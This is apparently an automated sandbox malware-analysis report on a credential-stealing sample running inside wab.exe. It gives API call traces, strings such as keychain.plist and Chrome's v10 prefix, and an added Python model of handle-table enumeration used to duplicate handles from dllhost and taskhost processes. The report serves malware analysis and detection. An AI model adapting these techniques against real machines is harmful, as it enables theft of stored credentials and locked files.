                                          • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                          • _wcsicmp.MSVCRT ref: 0040DEB2
                                          • _wcsicmp.MSVCRT ref: 0040DEC5
                                          • _wcsicmp.MSVCRT ref: 0040DED8
                                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                          • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                          • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                          • memset.MSVCRT ref: 0040DF5F
                                          • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                          • _wcsicmp.MSVCRT ref: 0040DFB2
                                          • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                                          • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                          • API String ID: 594330280-3398334509
                                          • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                          • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                          • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                          • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                          Control-flow Graph: function 00413D4C, blocks 413d4c..413f24 (rendered graph and executed/not-executed colouring not reproduced). The Process32NextW block 413f00 heads the enumeration loop 413f00->413da5->...->413eb0->413f00; OpenProcess is attempted for each entry, and the 413e37->413e46 path resolves QueryFullProcessImageNameW from kernel32.dll at run time via GetModuleHandleW/GetProcAddress.
                                          APIs
                                            • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                          • memset.MSVCRT ref: 00413D7F
                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                          • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                          • memset.MSVCRT ref: 00413E07
                                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                          • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                          • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                          • String ID: QueryFullProcessImageNameW$kernel32.dll
                                          • API String ID: 912665193-1740548384
                                          • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                          • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                          • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                          • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
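
                                          The two entries above describe one mechanism: 0040DD85 queries the system handle table (NtQuerySystemInformation class 0x10, SystemHandleInformation), retries with a bigger buffer on STATUS_INFO_LENGTH_MISMATCH (the C0000004 visible in the trace arguments), matches process names case-insensitively against dllhost.exe, taskhost.exe and taskhostex.exe, opens each match with PROCESS_DUP_HANDLE (0x40) and duplicates its handles, while 00413D4C supplies the (pid, image name) list through a Toolhelp32 walk with QueryFullProcessImageNameW resolved at run time. The Python below is an added example written for this report; it is not code from the sample, from NirSoft or from Joe Sandbox. It parses the 32-bit SYSTEM_HANDLE_INFORMATION layout over a constructed buffer, drives the grow-and-retry loop against a stand-in for ntdll, and applies the same name filter. Whether the GetCurrentProcessId value is used to skip the caller's own handles is an assumption, as is the 0x1000 initial buffer size read from the trace arguments; the constructed process list and handle entries are invented test data.

```python
import struct

STATUS_SUCCESS = 0x00000000
STATUS_INFO_LENGTH_MISMATCH = 0xC0000004   # the C0000004 value visible in the trace arguments
SYSTEM_HANDLE_INFORMATION = 0x10          # first argument of NtQuerySystemInformation at 0040DE15
PROCESS_DUP_HANDLE = 0x40                 # desired access passed to OpenProcess at 0040DEEC

# 32-bit SYSTEM_HANDLE_TABLE_ENTRY_INFO (16 bytes), matching the x86 image mapped at 0x400000:
# USHORT UniqueProcessId; USHORT CreatorBackTraceIndex; UCHAR ObjectTypeIndex;
# UCHAR HandleAttributes; USHORT HandleValue; PVOID Object; ULONG GrantedAccess
ENTRY_FMT = "<HHBBHII"
ENTRY_SIZE = struct.calcsize(ENTRY_FMT)

# The three image names in the function's String ID; _wcsicmp makes the match case-insensitive.
TARGET_IMAGE_NAMES = ("dllhost.exe", "taskhost.exe", "taskhostex.exe")


def is_target_process(image_name):
    return image_name.lower() in TARGET_IMAGE_NAMES


def target_pids(process_list):
    """process_list is what the Toolhelp32 walk at 00413D4C yields: (pid, image name) pairs."""
    return {pid for pid, name in process_list if is_target_process(name)}


def build_handle_table(entries):
    """Constructed SYSTEM_HANDLE_INFORMATION buffer: ULONG NumberOfHandles followed by entries."""
    return struct.pack("<I", len(entries)) + b"".join(struct.pack(ENTRY_FMT, *e) for e in entries)


class FakeNtdll:
    """Stand-in for ntdll with NtQuerySystemInformation's real size convention: when the
    caller's buffer is too small it returns STATUS_INFO_LENGTH_MISMATCH and the needed length."""

    def __init__(self, table):
        self._table = table
        self.calls = 0

    def NtQuerySystemInformation(self, info_class, buf_len):
        self.calls += 1
        if info_class != SYSTEM_HANDLE_INFORMATION:
            raise ValueError("only SystemHandleInformation is modelled")
        if buf_len < len(self._table):
            return STATUS_INFO_LENGTH_MISMATCH, b"", len(self._table)
        return STATUS_SUCCESS, self._table, len(self._table)


def query_handle_table(ntdll, initial_len=0x1000, max_len=1 << 26):
    """The 40ddf1 -> 40de0b -> 40de20 -> 40de29 -> 40ddf1 cycle: retry with a larger buffer
    until the call succeeds (0x1000 is assumed to be the initial size, from the trace arguments)."""
    buf_len = initial_len
    while buf_len <= max_len:
        status, data, needed = ntdll.NtQuerySystemInformation(SYSTEM_HANDLE_INFORMATION, buf_len)
        if status == STATUS_SUCCESS:
            return data
        if status != STATUS_INFO_LENGTH_MISMATCH:
            raise OSError("NtQuerySystemInformation failed: 0x%08X" % status)
        buf_len = max(buf_len * 2, needed)
    raise MemoryError("handle table larger than max_len")


def parse_handle_table(buf):
    (count,) = struct.unpack_from("<I", buf, 0)
    entries, off = [], 4
    for _ in range(count):
        pid, _bt, type_idx, attrs, hval, obj, access = struct.unpack_from(ENTRY_FMT, buf, off)
        off += ENTRY_SIZE
        entries.append({"pid": pid, "type": type_idx, "handle": hval, "object": obj, "access": access})
    return entries


def handles_to_duplicate(buf, pids, own_pid):
    """The 40df0b .. 40dfbd walk: every entry owned by a targeted process is a candidate for
    OpenProcess(PROCESS_DUP_HANDLE) + DuplicateHandle. Skipping the caller's own pid is an
    assumption about how the GetCurrentProcessId result at 0040DE49 is used."""
    return [h for h in parse_handle_table(buf) if h["pid"] in pids and h["pid"] != own_pid]


def demo():
    # Constructed data: a process list and a four-entry handle table (object addresses,
    # type indices and access masks are arbitrary).
    processes = [(4, "System"), (1234, "TaskHost.exe"), (2000, "wab.exe"), (5678, "explorer.exe")]
    table = build_handle_table([
        (4,    0, 0x1C, 0, 0x0004, 0x8A000100, 0x001F01FF),
        (1234, 0, 0x1C, 0, 0x00A8, 0x8A000200, 0x00120089),
        (1234, 0, 0x07, 0, 0x00AC, 0x8A000300, 0x001FFFFF),
        (5678, 0, 0x1C, 0, 0x0010, 0x8A000400, 0x00120089),
    ])
    ntdll = FakeNtdll(table)
    buf = query_handle_table(ntdll, initial_len=16)   # too small on purpose: forces one retry
    return ntdll.calls, handles_to_duplicate(buf, target_pids(processes), own_pid=2000)


if __name__ == "__main__":
    calls, hits = demo()
    print("NtQuerySystemInformation calls:", calls)
    for h in hits:
        print("pid %d handle 0x%04X type %d access 0x%08X" % (h["pid"], h["handle"], h["type"], h["access"]))
```

                                          On a real system the handle table is far larger than any fixed first guess, so a correct caller must loop exactly as the graph shows; a single oversized allocation is the usual shortcut and the retry cycle is a recognisable fingerprint of this code pattern. On 64-bit Windows the entry layout differs (SystemExtendedHandleInformation, class 0x40, with 8-byte pointers), so the 16-byte format above applies only to the 32-bit image in this dump.
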
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                          • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                          • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                          • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                          • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                          • memcpy.MSVCRT ref: 0040B60D
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                          • String ID: BIN
                                          • API String ID: 1668488027-1015027815
                                          • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                          • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                          • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                          • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                          APIs
                                            • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                            • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                            • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                          • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                          • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                          • String ID:
                                          • API String ID: 2947809556-0
                                          • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                          • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                          • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                          • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                          APIs
                                          • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                          • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: FileFind$FirstNext
                                          • String ID:
                                          • API String ID: 1690352074-0
                                          • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                          • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                          • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                          • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                          APIs
                                          • memset.MSVCRT ref: 0041898C
                                          • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: InfoSystemmemset
                                          • String ID:
                                          • API String ID: 3558857096-0
                                          • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                          • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                          • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                          • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                          Control-flow Graph: function 0044553B, blocks 44553b..445fb2 (rendered graph and executed/not-executed colouring not reproduced; the edge list is too large to be useful as text). The early branch at 44555a calls 40c768, 40bdb0 (CredEnumerateW) and 4135f7; the remainder is a long sequence of memset/path-building blocks that feed 40b6ef (file open), 445093 (file read) and the 40ae18/40ae51 directory walk, with the _wcsicmp at 445d3d selecting the 445093 read path.
                                          APIs
                                          • memset.MSVCRT ref: 004455C2
                                          • wcsrchr.MSVCRT ref: 004455DA
                                          • memset.MSVCRT ref: 0044570D
                                          • memset.MSVCRT ref: 00445725
                                            • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                            • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                            • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                            • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                            • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                            • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                            • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                            • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                          • memset.MSVCRT ref: 0044573D
                                          • memset.MSVCRT ref: 00445755
                                          • memset.MSVCRT ref: 004458CB
                                          • memset.MSVCRT ref: 004458E3
                                          • memset.MSVCRT ref: 0044596E
                                          • memset.MSVCRT ref: 00445A10
                                          • memset.MSVCRT ref: 00445A28
                                          • memset.MSVCRT ref: 00445AC6
                                            • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                            • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                            • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                            • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                            • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                          • memset.MSVCRT ref: 00445B52
                                          • memset.MSVCRT ref: 00445B6A
                                          • memset.MSVCRT ref: 00445C9B
                                          • memset.MSVCRT ref: 00445CB3
                                          • _wcsicmp.MSVCRT ref: 00445D56
                                          • memset.MSVCRT ref: 00445B82
                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                          • memset.MSVCRT ref: 00445986
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                          • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                          • API String ID: 2745753283-3798722523
                                          • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                          • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                          • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                          • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                          Control-flow Graph (rendered graph not reproduced)

                                          APIs
                                            • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                            • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                            • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                            • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                          • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                          • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                          • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                          • String ID: $/deleteregkey$/savelangfile
                                          • API String ID: 2744995895-28296030
                                          • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                          • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                          • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                          • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                          Control-flow Graph (rendered graph not reproduced)

                                          APIs
                                          • memset.MSVCRT ref: 0040B71C
                                            • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                            • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                          • wcsrchr.MSVCRT ref: 0040B738
                                          • memset.MSVCRT ref: 0040B756
                                          • memset.MSVCRT ref: 0040B7F5
                                          • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                          • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                          • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                          • memset.MSVCRT ref: 0040B851
                                          • memset.MSVCRT ref: 0040B8CA
                                          • memcmp.MSVCRT ref: 0040B9BF
                                            • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                          • memset.MSVCRT ref: 0040BB53
                                          • memcpy.MSVCRT ref: 0040BB66
                                          • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateDeleteFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                                          • String ID: chp$v10
                                          • API String ID: 170802307-2783969131
                                          • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                          • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                          • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                          • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

Control-flow Graph

• Graph image not reproduced; its nodes cover the basic blocks from 40e2ab through 40e4af.
                                          APIs
                                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                          • memset.MSVCRT ref: 0040E380
                                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                            • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                          • wcschr.MSVCRT ref: 0040E3B8
                                          • memcpy.MSVCRT ref: 0040E3EC
                                          • memcpy.MSVCRT ref: 0040E407
                                          • memcpy.MSVCRT ref: 0040E422
                                          • memcpy.MSVCRT ref: 0040E43D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                          • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                          • API String ID: 3073804840-2252543386
                                          • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                          • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                          • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                          • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

Control-flow Graph

• Graph image not reproduced; its nodes cover the basic blocks from 4091b8 through 409526.
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                          • String ID:
                                          • API String ID: 3715365532-3916222277
                                          • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                          • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                          • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                          • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                            • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                            • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                            • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                            • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                            • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                          • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                          • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                          • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                            • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                            • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                            • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                            • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                          • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                          • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                          • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                          • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                          • CloseHandle.KERNEL32(?), ref: 0040E148
                                          • CloseHandle.KERNEL32(?), ref: 0040E14D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                          • String ID: bhv
                                          • API String ID: 327780389-2689659898
                                          • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                          • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                          • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                          • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

Control-flow Graph

• Graph image not reproduced; its nodes cover the basic blocks from 413f4f through 413fa5.
                                          APIs
                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
